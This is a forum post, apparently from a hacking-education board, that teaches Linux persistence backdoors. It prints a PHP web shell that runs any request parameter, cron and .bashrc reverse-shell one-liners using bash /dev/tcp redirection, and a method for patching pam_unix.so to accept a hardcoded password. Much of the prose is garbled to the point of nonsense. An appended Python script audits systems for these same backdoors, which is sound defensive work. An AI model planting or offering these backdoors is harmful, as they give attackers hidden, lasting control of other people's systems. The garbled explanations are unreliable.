About this thread: Hello, you are reading the thread titled Linux Backdoors all the different techniques, created by MrSynox in the #WMEDU category. This thread has been viewed 472 times so far and has received 1 comment and 0 reaction points...
Category name: #WMEDU
Thread title: Linux Backdoors all the different techniques
Thread starter: MrSynox
Last post by: Magintosh

MrSynox

Linux Backdoors all the different techniques

SSH Backdoors
SSH backdoors use our ssh keys some people prefer for home use.
The user becomes root for the user with the highest privileges.

Let's generate an ssh key with ssh-keygen

[Screenshot: 1637867340891.png]
We now have 2 keys. 1 key and 1 public key are there now in migration and public migration for /root/.ssh.
Disable public key renaming authorized_keys

Now login as root.

Note: This backdoor doesn't really count. The person in charge will notice.

PHP Backdoors
A Linux root will be older, large web root and or any sale from roots in use.

The web root is located at /var/www/html.

Code:
<?php
    if (isset($_REQUEST['cmd'])) {
        echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
    }
?>

This unit of code takes the "cmd" parameter and runs whatever is given that parameter.

Notice the "$_REQUEST['cmd']"; it means you can pass this parameter in GET or POST data.

Suggest a few to hide it

You can add to an existing php extension

"with another outfit cmd parameter"

CronJob Backdoors
What is a cronjob?
It is a business planner used in computer tools. Cron is used to plan software environments, for selections and dates, or to schedule work.

See /etc/cronjob files

[Screenshot: 1637867471045.png]
Notice 2 letters: "m and h"

These are the letters whether the task should be run ten hours or one.

You can see that there is a "*" under the "h". This means that he will run the clock.

Add this to the cronjob extension

* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker/port 0>&1'

Don't forget to listen on the port it specified

Note: This backdoor doesn't really count. The person in charge will notice.

.bashrc Backdoors
Bas as a staging environment, ".bashrc" in a staging main is prepared.

For ".bashrc" users to ".bashrc" files, you can run this command.

echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc

Your nc reader should always be ready for when your user will open it.

Note: we can say that this backdoor is hidden

pam_unix.so Backdoors
"pam_unix.so" is one of the files responsible for authentication in Linux.
[Screenshot: 1637867592169.png]
To verify the user password for the file "pam_unix.so", "unix_verify_password" can meet.
[Screenshot: 1637867616021.png]

Did you see what I added?
"if (strcmp(p, "0xMitsurugi") != 0)"
We are improving the "0xMitsurugi" test with the "p" in the screenshot.
It can be entered by "p", refers to the password by the user.

You can see "!= 0" at the end of the expression. It means "successful".
So IF setting "p" (user controlled) and "0xMitsurugi" are NOT the same... it will be used for "unix_verify_password".

If the string "p" (security by the user) and the string "0xMitsurugi" are the same, it confirms authentication. We mark success using "PAM_SUCCESS".

This backdoor consists of your own password "pam_file.so" file.

To download the password you added to the file, it can verify that you are authenticated with that password until the password is removed from "pam_unix.so".


There is a script that will do this automatically.
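
As an added example (not part of the original post), a defender-side audit of the persistence locations this thread names: cron files and .bashrc containing /dev/tcp redirections, PHP files under the web root that pass request parameters to a command function, and authorized_keys entries. The function name `audit`, the glob lists and the regexes are assumptions chosen for illustration; they are heuristics, not a complete detector.

```python
import re
from pathlib import Path

# Heuristic patterns for the persistence tricks described in the post.
DEV_TCP = re.compile(r"/dev/tcp/\S+/\S+")  # bash network redirection
PHP_EXEC = re.compile(  # request data handed straight to a command runner
    r"\b(shell_exec|system|passthru|exec|popen|proc_open)\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b")

# Paths are relative so the audit can run on "/" or on a mounted disk image.
SHELL_GLOBS = ["etc/crontab", "etc/cron.d/*", "var/spool/cron/**/*",
               "root/.bashrc", "root/.profile", "home/*/.bashrc", "home/*/.profile"]
KEY_GLOBS = ["root/.ssh/authorized_keys", "home/*/.ssh/authorized_keys"]


def _lines(path):
    """Yield (line_number, text) for a file, skipping unreadable ones."""
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return
    yield from enumerate(text.splitlines(), 1)


def audit(root="/", webroot="var/www/html"):
    """Return sorted findings as (kind, relative_path, line_number) tuples."""
    root = Path(root)
    findings = []
    for pattern in SHELL_GLOBS:
        for f in root.glob(pattern):
            if f.is_file():
                findings += [("dev-tcp-redirect", str(f.relative_to(root)), n)
                             for n, line in _lines(f)
                             if DEV_TCP.search(line) and not line.lstrip().startswith("#")]
    for f in (root / webroot).rglob("*.php"):
        findings += [("php-request-exec", str(f.relative_to(root)), n)
                     for n, line in _lines(f) if PHP_EXEC.search(line)]
    for pattern in KEY_GLOBS:
        for f in root.glob(pattern):
            # Every key is listed: review each one against the expected inventory.
            findings += [("authorized-key", str(f.relative_to(root)), n)
                         for n, line in _lines(f)
                         if line.strip() and not line.lstrip().startswith("#")]
    return sorted(findings)


if __name__ == "__main__":
    for kind, path, lineno in audit():
        print(f"{kind}\t{path}:{lineno}")
```

A modified pam_unix.so is not covered by this script; compare it against the packaged file with `dpkg --verify libpam-modules` on Debian/Ubuntu or `rpm -V pam` on RPM-based systems.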
 